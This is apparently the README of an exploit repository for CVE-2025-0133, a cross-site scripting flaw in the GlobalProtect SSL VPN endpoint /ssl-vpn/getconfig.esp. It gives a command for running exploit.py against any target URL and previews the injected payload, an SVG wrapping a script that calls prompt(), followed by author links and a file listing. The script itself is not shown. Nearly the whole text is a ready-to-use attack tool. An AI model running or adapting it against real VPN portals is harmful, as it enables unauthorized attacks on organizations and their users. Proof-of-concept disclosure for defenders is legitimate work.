CVE-2025-0133 GlobalProtect XSS# mitsec_vpn_xss_exploit
🔓 Exploit for GlobalProtect SSL VPN endpoint `/ssl-vpn/getconfig.esp` that appends a crafted XSS payload to the URL.
## Usage
```bash
python3 exploit.py -u https://target.com
```
## Parameters
- `-u`, `--url`: Base target URL (do **not** include query params)
## Payload Preview
```html
<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("mitsec")</script></svg>
```
## Author
- GitHub: [ynsmroztas](https://github.com/ynsmroztas)
- Twitter: [@ynsmroztas](https://twitter.com/ynsmroztas)
[4.0K] /data/pocs/e50fc724175e4caa369b5e41e75754bbb1473f66
├── [1.9K] exploit.py
├── [485K] Globalprotect-vpn.jpg
└── [ 529] README.md
0 directories, 3 files